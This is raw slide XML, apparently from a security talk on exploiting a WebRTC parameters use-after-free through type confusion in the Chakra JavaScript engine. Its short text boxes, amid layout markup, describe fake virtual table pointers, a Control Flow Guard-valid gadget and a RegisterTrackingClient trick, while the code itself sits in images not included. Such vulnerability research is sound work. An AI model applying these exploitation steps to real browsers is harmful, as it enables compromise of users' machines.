                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF891938-C438-4ED0-A4CF-A45BFC76EB4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091703" y="8840801"/>
            <a:ext cx="4552959" cy="1422800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="矩形 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9924FB3F-BE3D-4BDC-A66B-ADB9FF48B537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1738731" y="8791423"/>
            <a:ext cx="2365308" cy="22825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5E0CA0C9-361F-4C4C-97AB-0E5D06B858AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8548261" y="5770984"/>
            <a:ext cx="3708128" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="914400">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake virtual table pointer +0x88 must have a specific function that can modify the relevant area of the fake object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="矩形 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2955D5B-6B39-4101-BE9A-65DF5CFBD010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1847578" y="7184045"/>
            <a:ext cx="6429824" cy="22561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6466206C-6AB9-49DB-AF0D-DB6B12939487}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052721" y="5815288"/>
            <a:ext cx="7026641" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Js:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CJavascriptOperations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetProperty</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="矩形 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC21E30A-2381-4E3B-94EB-D7CA7490751E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3962867" y="3703431"/>
            <a:ext cx="3504733" cy="202536"/>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51" name="图片 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{122BBF10-8BB8-4846-851C-15973949EC0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372354" y="8887427"/>
            <a:ext cx="5659226" cy="1347435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="连接符: 肘形 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73555415-B5DF-4ABF-92F3-1FC4FB2C7F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="44" idx="1"/>
            <a:endCxn id="73" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="1738731" y="8905550"/>
            <a:ext cx="100560" cy="1276394"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -116550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3" name="连接符: 肘形 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1D6B03-C912-4921-AB07-251850C8E0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="54" idx="2"/>
            <a:endCxn id="44" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="5828078" y="5884730"/>
            <a:ext cx="211530" cy="6024915"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20807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4" name="矩形 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6601871B-F5D6-42B8-8C56-1A66FD584751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7910399" y="9002953"/>
            <a:ext cx="2071801" cy="22210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pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="图片 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E79CDB3-2C3E-4C5D-8E8D-3541F3A9406F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="6235995"/>
            <a:ext cx="7059531" cy="1866899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="连接符: 肘形 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEB7731-65B7-4903-B78D-8297CE159AEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="38" idx="1"/>
            <a:endCxn id="48" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1052721" y="5405979"/>
            <a:ext cx="634170" cy="640141"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 136047"/>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8" name="矩形 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97436E47-57B5-45EB-85B7-B27C6091252E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1686891" y="5295686"/>
            <a:ext cx="2275976" cy="220588"/>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50" name="连接符: 肘形 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E51F59E-D31D-45FE-8B89-20A76F03FFAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="47" idx="1"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1091704" y="7296851"/>
            <a:ext cx="755875" cy="1086647"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13024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3" name="矩形 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C8180B8-330F-48C0-80D1-F265C241B624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1839291" y="10050909"/>
            <a:ext cx="2746564" cy="26207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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2887511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21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092F9F4E-729B-40A1-9871-BE9874A8097F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045235" y="2514058"/>
            <a:ext cx="11304748" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After searching, we finally found a qualified function in chakra.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="图片 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17385A7C-9998-40FB-83E2-C7661EEE1682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3021120"/>
            <a:ext cx="7221871" cy="2052351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="图片 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012B647D-9864-4F45-AF10-C49067DCF651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="5110107"/>
            <a:ext cx="7221871" cy="1791090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="图片 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C9DD9D-6ACD-471D-803D-84733F79AF2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="6937832"/>
            <a:ext cx="7221871" cy="319956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="矩形 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AA9C24-386A-43E9-A17D-94B2BD42D2F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5384617" y="3433460"/>
            <a:ext cx="2463983" cy="224139"/>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7C2003F4-CCC0-498D-9306-A617DC159FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8299996" y="3033010"/>
            <a:ext cx="3596729" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> points to fake objects</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="连接符: 肘形 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3B8415-7A94-45A1-851B-0AC85C3607A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="3"/>
            <a:endCxn id="43" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7848600" y="3263843"/>
            <a:ext cx="451396" cy="281686"/>
          </a:xfrm>
          <a:prstGeom prst="bent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6" name="矩形 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD1C0C9-3535-4583-A026-06CAF6F0D2C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5167301" y="5497295"/>
            <a:ext cx="2186000" cy="17960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57" name="文本框 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F9889D9-31FD-477D-A5D2-BB6E0D8DE76B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011475" y="7674394"/>
            <a:ext cx="7436489" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But the method on the virtual table pointer +8 position need to ensure that is also a valid CFG target address and can not produce any side effects (context changes, crashes, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="连接符: 肘形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3628543A-EE2D-47AD-986E-A589B10373F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="56" idx="1"/>
            <a:endCxn id="57" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4729721" y="5587096"/>
            <a:ext cx="437581" cy="2087297"/>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8" name="文本框 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB6F4C7-C0E2-49D2-9812-485C66A7621B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8818898" y="5373295"/>
            <a:ext cx="3132694" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RegisterTrackingClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can point the fake object +68h position to the fake object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="矩形 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F43AAE79-A089-43BC-8FEB-C7A1E1393C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5200193" y="6483676"/>
            <a:ext cx="2389328" cy="179605"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="连接符: 肘形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F75C997-34BE-489D-9048-38C44DED84AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="59" idx="2"/>
            <a:endCxn id="58" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7444102" y="5108881"/>
            <a:ext cx="325551" cy="2424041"/>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002241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fr-FR" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>WebRTC Parameters UAF </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploitation </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="fr-FR" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>: Type Confusion</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20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4770B5BC-3CE5-4BAF-98EA-1124CD47ADA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1086591" y="7625235"/>
            <a:ext cx="11084690" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>The fake virtual table pointer is</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17588E35-4A18-4985-AEE0-D1E1242C695C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079903" y="8199472"/>
            <a:ext cx="10951677" cy="568597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFF81F9-4C48-4CB8-BB62-A2C7F03CE61F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068230" y="3447230"/>
            <a:ext cx="10953455" cy="502814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1802748-DA66-42C5-B622-406BEF3A7D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068229" y="4022966"/>
            <a:ext cx="10953455" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
